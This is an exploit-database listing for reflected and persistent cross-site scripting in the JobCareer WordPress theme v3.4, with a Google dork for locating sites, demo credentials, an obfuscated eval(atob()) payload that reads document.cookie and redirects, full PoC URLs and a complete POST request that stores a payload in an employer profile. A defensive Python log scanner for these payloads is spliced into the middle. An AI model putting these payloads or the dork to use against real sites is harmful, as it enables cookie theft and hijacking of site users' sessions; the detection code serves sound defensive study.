JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

CVE: CVE-2021-24189
Category: CWE-79
Price: $500
Severity: High

Author: Rakesh Mane
Risk: High
Exploitation Type: Remote
Date: 2020-07-27

CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.93
EPSSP: 0.99403

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070129

Below is a copy:

[+] Exploit Title: JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/jobcareer/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 3.4
[+] Software Link: https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] Unauthenticated Reflected and Authenticated Persistent XSS vulnerabilities were discovered in the JobCareer theme through version 3.4 for WordPress.

[i] Unauthenticated Reflected XSS -> Vulnerable parameters: job_title, specialisms, location

[i] Authenticated Persistent XSS on Employer Profile -> Complete Address text field

[i] Demo account: vladvector / vector (login / password)

[i] PoC Employer Profile URL: http://jobcareer.chimpgroup.com/employer/vladvector/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS

[x] Authenticated Persistent XSS



### [ Payloads: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>

[$] "><!--<img src="--><img src=x onerror=(alert)(`VLADVECTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">



### [ PoC Unauthenticated Reflected XSS: ]

[!] http://jobcareer.chimpgroup.com/jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job

[!] GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1
Host: jobcareer.chimpgroup.com
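A log-side check for the reflected XSS above, added here as an example and not part of the advisory: it URL-decodes request targets, inspects the three parameters the advisory names, and decodes any base64 handed to atob() so the payload's hidden content (here alert(document.cookie) and the redirect) is visible to a rule or an analyst rather than masked behind the encoding. Function names, the one-request-per-line log format and the sample lines are assumptions; line 2 of the constructed sample reuses the advisory's own PoC target.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory names as reflected without escaping.
VULN_PARAMS = ("job_title", "specialisms", "location")
# Markup, inline event handlers and JS sinks that never belong in a job search.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:|eval\s*\(", re.I)
# atob('<base64>') with any quote style, including the backticks used in the PoC.
ATOB_RE = re.compile(r"atob\s*\(\s*[`'\"]([A-Za-z0-9+/=]+)[`'\"]\s*\)")

def decode_atob_args(value):
    """Decode every base64 literal handed to atob() so the hidden JS becomes readable."""
    decoded = []
    for b64 in ATOB_RE.findall(value):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass  # not valid base64: the raw value stays in the finding instead
    return decoded

def inspect_request(path_and_query):
    """Return findings for one request target; an empty list means nothing suspicious."""
    params = parse_qs(urlsplit(path_and_query).query, keep_blank_values=True)
    findings = []
    for name in VULN_PARAMS:
        for value in params.get(name, []):
            if MARKUP_RE.search(value):
                findings.append({"param": name, "value": value,
                                 "decoded": decode_atob_args(value)})
    return findings

def scan_log(lines):
    """Run inspect_request over 'METHOD target HTTP/x' lines, tagging each hit with its line number."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) >= 2 and parts[0] in ("GET", "POST"):
            for finding in inspect_request(parts[1]):
                hits.append(dict(finding, line=lineno))
    return hits

# Constructed sample (assumption): line 2 is the advisory's PoC target, lines 1 and 3 are made up.
SAMPLE_LOG = [
    "GET /jobs-modern-list/?job_title=python+developer&location=London HTTP/1.1",
    "GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&location=&radius=5 HTTP/1.1",
    "GET /jobs-modern-list/?job_title=&specialisms=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['param']}={hit['value']!r} decoded={hit['decoded']}")
```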



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: jobcareer.chimpgroup.com
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------373898295520776006712397621876
Content-Length: 3832
Origin: http://jobcareer.chimpgroup.com
Referer: http://jobcareer.chimpgroup.com/employer-account/?profile_tab=profile
Cookie: [cookies_here]

-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cover_media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cover_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="display_name"

VladVector
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_allow_search"

yes
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_specialisms[]"

banking
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="comp_detail"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_facebook"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_twitter"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_linkedin"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_phone_number"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_email"

[email protected]
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_url"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_country"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_city"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_comp_address"

"><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//">
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_address"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_latitude"

51.5073509
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_longitude"

-0.12775829999998223
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_add_new_loc"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_zoom"

11
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[established]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[team-size]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[type]"

private
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_profile"

update_profile
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_user"

12919
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="action"

ajax_employer_form_save
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="post_id"

12919
-----------------------------373898295520776006712397621876--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.